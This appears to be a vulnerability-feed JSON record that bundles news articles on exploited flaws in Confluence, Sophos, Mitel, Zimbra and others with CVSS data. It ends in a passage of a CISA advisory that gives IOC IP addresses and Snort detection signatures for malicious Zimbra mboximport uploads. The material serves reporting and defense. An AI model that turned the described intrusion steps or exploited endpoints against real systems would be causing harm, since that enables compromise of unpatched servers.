[uncovered](<https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055>) an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang [resurfaced](<https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/>) with Tsunami [IRC botnet](<https://en.wikipedia.org/wiki/IRC_bot>) variants and a custom \"PwnRig\" miner.\n\nNow according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server ([CVE-2022-26134)](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>) and Oracle WebLogic ([CVE-2019-2725](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>)) for initial access.\n\nThis step is succeeded by the retrieval of a malware loader from a remote server that's designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.\n\nBesides achieving persistence by means of a cron job, the \"loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate,\" Microsoft said.\n\nThe findings come as Akamai [revealed](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 67% of the attacks are said to have originated from the U.S.\n\n\"In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,\" Akamai's Chen Doytshman said this week. \"These top three verticals make up more than 75% of the activity.\"\n\nThe attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.\n\n\"What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,\" Doytshman added. \"As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T05:36:00", "type": "thn", "title": "Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2022-26134"], "modified": "2022-07-01T08:20:23", "id": "THN:F0450E1253FFE5CA527F039D3B3A72BD", "href": "https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T03:57:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjgpvdXejiTfwIlf3wPHIzsqwrtWGd_UVqF569qifyNIKommhLUjf5dLuF__8BWAVuomoK7Tjv03yLr8nENvhakrn1qW-YxaHhRkYOtDEmW8uq9xYxqTrmWnx4a-valU6Pz2wW9AJDs3n89ygTe8g5wduuCsFDkSwFnxhC6LGVpEIRGHIbakY-7iAww/s728-e100/hackers.jpg>)\n\nA sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack.\n\n\"The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff,\" Volexity [said](<https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/>) in a report. \"These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.\"\n\nThe zero-day flaw in question is tracked as [CVE-2022-1040](<https://thehackernews.com/2022/03/critical-sophos-firewall-rce.html>) (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier.\n\nThe cybersecurity firm, which issued a patch for the flaw on March 25, 2022, noted that it was abused to \"target a small set of specific organizations primarily in the South Asia region\" and that it had notified the affected entities directly.\n\nNow according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer's Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability.\n\n\"The attacker was using access to the firewall to conduct man-in-the-middle (MitM) attacks,\" the researchers said. \"The attacker used data collected from these MitM attacks to compromise additional systems outside of the network where the firewall resided.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjfKjGMxU9f1By4kZoaueFeICYJthIRyuvPWTxc8s0q2C7jWNX1Gnw6l06cNevtbWwc-WlR-RqbNxeIsdNPX2peEnO-wx8UlXLZt_DXhDA1SO-PFFO9ZBTJgHRcFERamkXbe2rC2UmykVCY8sMi4uQAmKGhBFdo0cmodi9751cbQW1T4L9-2SdlpXhr/s728-e100/cyber.jpg>)\n\nThe infection sequence post the firewall breach further entailed backdooring a legitimate component of the security software with the [Behinder](<https://github.com/Freakboy/Behinder>) web shell that could be remotely accessed from any URL of the threat actor's choosing.\n\nIt's noteworthy that the Behinder web shell was also leveraged earlier this month by Chinese APT groups in a separate set of intrusions exploiting a zero-day flaw in Atlassian Confluence Server systems ([CVE-2022-26134](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>)).\n\nAdditionally, the attacker is said to have created VPN user accounts to facilitate remote access, before moving on to modify DNS responses for specially targeted websites \u2014 primarily the victim's content management system (CMS) \u2014 with the goal of intercepting user credentials and session cookies.\n\nThe access to session cookies subsequently equipped the malicious party to take control of the WordPress site and install a second web shell dubbed [IceScorpion](<https://zhuanlan.zhihu.com/p/354906657>), with the attacker using it to deploy three open-source implants on the web server, including [PupyRAT](<https://github.com/n1nj4sec/pupy>), [Pantegana](<https://github.com/cassanof/pantegana>), and [Sliver](<https://github.com/BishopFox/sliver>).\n\n\"DriftingCloud is an effective, well equipped, and persistent threat actor targeting [five-poisons](<https://en.wikipedia.org/wiki/Five_Poisons>)-related targets. They are able to develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining entry to target networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-17T09:39:00", "type": "thn", "title": "Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-26134"], "modified": "2022-06-18T03:43:31", "id": "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "href": "https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T05:57:36", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEim4NFlgiedsZyM9nwoYZyVFg6NDuuooSW_q7ZeHdDb9c-nm4-fV2cZ6gwe2Qw3aeBydho972W0dJXA-6XkWQU2Zj04xgVPiu3gJoJh70MQgBnT_aY_qN1k1go36E2XRD6oe1BuRQFLz8N9817kpoUXk2pdVCpIEqyo820bqOR6_HxWEZUByMqpZhQl/s728-e100/hacking.jpg>)\n\nA suspected ransomware intrusion attempt against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.\n\nThe [findings](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.\n\nThe zero-day exploit in question is tracked as [CVE-2022-29499](<https://nvd.nist.gov/vuln/detail/CVE-2022-29499>) and was fixed by Mitel in April 2022 by means of a remediation script that it shared with customers. It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming.\n\n\"A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances \u2013 SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance,\" the company [noted](<https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0002>) in an advisory.\n\nThe exploit entailed two [HTTP GET requests](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>) \u2014 which are used to retrieve a specific resource from a server \u2014 to trigger remote code execution by fetching rogue commands from the attacker-controlled infrastructure.\n\nIn the incident investigated by CrowdStrike, the attacker is said to have used the exploit to create a reverse shell, utilizing it to launch a web shell (\"pdf_import.php\") on the VoIP appliance and download the open source [Chisel](<https://github.com/jpillora/chisel>) proxy tool.\n\nThe binary was then executed, but only after renaming it to \"[memdump](<https://www.kali.org/tools/memdump/>)\" in an attempt to fly under the radar and use the utility as a \"reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device.\" But subsequent detection of the activity halted their progress and prevented them from moving laterally across the network.\n\nThe disclosure arrives less than two weeks after German penetration testing firm SySS [revealed](<https://thehackernews.com/2022/06/researchers-disclose-rooting-backdoor.html>) two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could have allowed an attacker to gain root privileges on the devices.\n\n\"Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant,\" CrowdStrike researcher Patrick Bennett said.\n\n\"Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via 'one hop' from the compromised device.\"\n\nUpdate: According to security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1540309810176217088>), there are nearly 21,500 publicly accessible Mitel devices online, with the majority located in the U.S., followed by the U.K., Canada, France, and Australia.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T12:58:00", "type": "thn", "title": "Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499", "CVE-2022-29854", "CVE-2022-29855"], "modified": "2022-06-27T05:55:33", "id": "THN:DE707FE81271E115F82D9DA443CC56C8", "href": "https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-22T03:59:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgwDyGaM4FdPe7m1y8beGIF9lst24L3fkt-FcrOap-X3fu09AhyO7t96mPZ_Q18jTQk8eFV8Z51Gfcp2Ryc_rvunTZbKZlMR3V32iWdinfxc04Gi4-7Y00aCE5kd4OLdU_CVTDy9G5mG9nh8rknBtsXbXwgwYWh-zeyeSlzCme-VBas1mHIY53IAJWH/s728-e100/Atlassian-Confluence-Vulnerability.jpg>)\n\nAtlassian has rolled out fixes to remediate a critical security vulnerability pertaining to the use of hard-coded credentials affecting [the Questions For Confluence](<https://marketplace.atlassian.com/apps/1211644/questions-for-confluence>) app for Confluence Server and Confluence Data Center.\n\nThe flaw, tracked as **CVE-2022-26138**, arises when the app in question is enabled on either of two services, causing it to create a Confluence user account with the username \"disabledsystemuser.\"\n\nWhile this account, Atlassian says, is to help administrators migrate data from the app to Confluence Cloud, it's also created with a hard-coded password, effectively allowing viewing and editing all non-restricted pages within Confluence by default.\n\n\"A remote, unauthenticated attacker with knowledge of the hard-coded password could exploit this to log into Confluence and access any pages the [confluence-users group](<https://confluence.atlassian.com/doc/confluence-groups-139478.html>) has access to,\" the company [said](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) in an advisory, adding that \"the hard-coded password is trivial to obtain after downloading and reviewing affected versions of the app.\"\n\nQuestions for Confluence versions 2.7.34, 2.7.35, and 3.0.2 are impacted by the flaw, with fixes available in versions 2.7.38 and 3.0.5. Alternatively, users can [disable or delete](<https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html>) the disabledsystemuser account.\n\nWhile Atlassian has pointed out that there's no evidence of active exploitation of the flaw, users can look for indicators of compromise by checking the last authentication time for the account. \"If the last authentication time for disabledsystemuser is null, that means the account exists but no one has ever logged into it,\" it said.\n\nSeparately, the Australian software company also moved to patch a pair of critical flaws, which it calls servlet filter dispatcher vulnerabilities, impacting multiple products -\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Fisheye and Crucible\n * Jira Server and Data Center, and\n * Jira Service Management Server and Data Center\n\nSuccessful exploitation of the bugs, tracked as CVE-2022-26136 and CVE-2022-26137, could enable an unauthenticated, remote attacker to bypass authentication used by third-party apps, execute arbitrary JavaScript code, and circumvent the cross-origin resource sharing ([CORS](<https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS>)) browser mechanism by sending a specially crafted HTTP request.\n\n\"Atlassian has released updates that fix the root cause of this vulnerability, but has not exhaustively enumerated all potential consequences of this vulnerability,\" the company [cautioned](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>) in its advisory regarding CVE-2022-26137.\n\n**_Update:_** Atlassian on Thursday warned that the critical Questions For Confluence app vulnerability is likely to be exploited in the wild after the hard-coded password became publicly known, urging its customers to remediate the issue as soon as possible.\n\n\"An external party has discovered and publicly disclosed the hardcoded password on Twitter,\" the company said. \"It is important to remediate this vulnerability on affected systems immediately.\"\n\nThe software firm also emphasized that uninstalling the Questions for Confluence app does not address the vulnerability, as the created account does not get automatically removed after the app has been uninstalled. It's instead recommending that users either update to the latest version of the app or manually disable or delete the account.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-07-21T08:41:00", "type": "thn", "title": "Atlassian Rolls Out Security Patch for Critical Confluence Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-22T02:37:51", "id": "THN:F050B7CE35D52E330ED83AACF83D6B29", "href": "https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2023-06-06T18:28:22", "description": "### Summary\n\nActions for ZCS administrators to take today to mitigate malicious cyber activity:\n\n\u2022 Patch all systems and prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Deploy detection signatures and hunt for indicators of compromise (IOCs). \n\u2022 If ZCS was compromised, remediate malicious activity.\n\n_Updated November 10, 2022: This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) with contributions by the Federal Bureau of Investigation (FBI)._\n\nCISA and the MS-ISAC are publishing this joint Cybersecurity Advisory (CSA) in response to active exploitation of multiple Common Vulnerabilities and Exposures (CVEs) against Zimbra Collaboration Suite (ZCS), an enterprise cloud-hosted collaboration software and email platform. CVEs currently being exploited against ZCS include:\n\n * CVE-2022-24682\n * CVE-2022-27924\n * CVE-2022-27925 chained with CVE-2022-37042\n * CVE-2022-30333\n\nCyber threat actors may be targeting unpatched ZCS instances in both government and private sector networks. CISA and the MS-ISAC strongly urge users and administrators to apply the guidance in the Recommendations section of this CSA to help secure their organization\u2019s systems against malicious cyber activity. CISA and the MS-ISAC encourage organizations who did not immediately update their ZCS instances upon patch release, or whose ZCS instances were exposed to the internet, to assume compromise and hunt for malicious activity using the third-party detection signatures in the Detection Methods section of this CSA. Organizations that detect potential compromise should apply the steps in the Incident Response section of this CSA.\n\n**_Updated November 10_**, **_2022_**:\n\nThis CSA has been updated with additional IOCs. For a downloadable copy of the IOCs, see the following Malware Analysis Reports (MARs):\n\n * [MAR-10400779-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270a>)\n * [MAR-10400779-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270b>)\n * [MAR-10401765-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-270c>)\n * [MAR-10398871-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-292a>)\n * _New, November 10, 2022:_ [MAR-10410305-1.v1 JSP Webshell](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-314a>)\n\n**_Update End_**\n\nDownload the PDF version of this report: pdf, 480 kb\n\nDownload the IOCs: .stix 12.2 kb\n\n### Technical Details\n\n#### CVE-2022-27924\n\nCVE-2022-27924 is a high-severity vulnerability enabling an unauthenticated malicious actor to inject arbitrary memcache commands into a targeted ZCS instance and cause an overwrite of arbitrary cached entries. The actor can then steal ZCS email account credentials in cleartext form without any user interaction. With valid email account credentials in an organization not enforcing multifactor authentication (MFA), a malicious actor can use spear phishing, social engineering, and business email compromise (BEC) attacks against the compromised organization. Additionally, malicious actors could use the valid account credentials to open webshells and maintain persistent access.\n\nOn March 11, 2022, researchers from SonarSource announced the discovery of this ZCS vulnerability. Zimbra issued fixes for releases 8.8.15 and 9.0 on May 10, 2022. Based on evidence of active exploitation, CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 4, 2022. Due to ease of exploitation, CISA and the MS-ISAC expect to see widespread exploitation of unpatched ZCS instances in government and private networks.\n\n#### CVE-2022-27925 and CVE-2022-37042\n\nCVE-2022-27925 is a high severity vulnerability in ZCS releases 8.8.15 and 9.0 that have mboximport functionality to receive a ZIP archive and extract files from it. An authenticated user has the ability to upload arbitrary files to the system thereby leading to directory traversal.[[1](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)] On August 10, 2022, researchers from Volexity reported widespread exploitation\u2014against over 1,000 ZCS instances\u2014of CVE-2022-27925 in conjunction with CVE-2022-37042.[[2](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)] CISA added both CVEs to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 11, 2022.\n\nCVE 2022 37042 is an authentication bypass vulnerability that affects ZCS releases 8.8.15 and 9.0. CVE 2022 37042 could allow an unauthenticated malicious actor access to a vulnerable ZCS instance. According to Zimbra, CVE 2022 37042 is found in the MailboxImportServlet function.[[3][](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)[4](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)] Zimbra issued fixes in late July 2022.\n\n#### CVE-2022-30333\n\nCVE-2022-30333 is a high-severity directory traversal vulnerability in RARLAB UnRAR on Linux and UNIX allowing a malicious actor to write to files during an extract (unpack) operation. A malicious actor can exploit CVE-2022-30333 against a ZCS server by sending an email with a malicious RAR file. Upon email receipt, the ZCS server would automatically extract the RAR file to check for spam or malware.[[5](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Any ZCS instance with unrar installed is vulnerable to CVE-2022-30333.\n\nResearchers from SonarSource shared details about this vulnerability in June 2022.[[6](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)] Zimbra made configuration changes to use the 7zip program instead of unrar.[[7](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)] CISA added CVE-2022-3033 to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on August 9, 2022. Based on industry reporting, a malicious cyber actor is selling a cross-site scripting (XSS) exploit kit for the ZCS vulnerability to CVE 2022 30333. A Metasploit module is also available that creates a RAR file that can be emailed to a ZCS server to exploit CVE-2022-30333.[[8](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)]\n\n#### CVE-2022-24682\n\nCVE-2022-24682 is a medium-severity vulnerability that impacts ZCS webmail clients running releases before 8.8.15 patch 30 (update 1), which contain a cross-site scripting (XSS) vulnerability allowing malicious actors to steal session cookie files. Researchers from Volexity shared this vulnerability on February 3, 2022[[9](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)], and Zimbra issued a fix on February 4, 2022.[[10](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)] CISA added this vulnerability to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) on February 25, 2022.\n\nDETECTION METHODS\n\nNote: CISA and the MS-ISAC will update this section with additional IOCs and signatures as further information becomes available.\n\nCISA recommends administrators, especially at organizations that did not immediately update their ZCS instances upon patch release, to hunt for malicious activity using the following third-party detection signatures:\n\n * _**Updated September 27**_, _**2022**_: Hunt for IOCs including:\n\nIP Addresses\n\n| \n\nNote \n \n---|--- \n \n62.113.255[.]70\n\n| \n\nNew September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042 \n \n185.112.83[.]77\n\n| \n\nNew September 27, 2022: Used by cyber actors during August 15-26, 2022 while attempting to exploit CVE-2022-27925 and CVE-2022-37042 \n \n207.148.76[.]235\n\n| \n\nA Cobalt Strike command and control (C2) domain \n \n209.141.56[.]190\n\n| \n\nNew September 27, 2022 \n \n * _**Updated August 23**_, _**2022**_: Deploy Snort signatures to detect malicious activity:\n\nalert tcp any any -&gt; any any (msg:\"ZIMBRA: HTTP POST content data '.jsp' file'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"file|3a|\"; nocase; http_client_body; content:\"|2e|jsp\"; http_client_body; fast_pattern; classtype:http-content; reference:cve,2022-30333;)\n\nalert tcp any any -&gt; any any (msg:\"ZIMBRA: Client HTTP Header 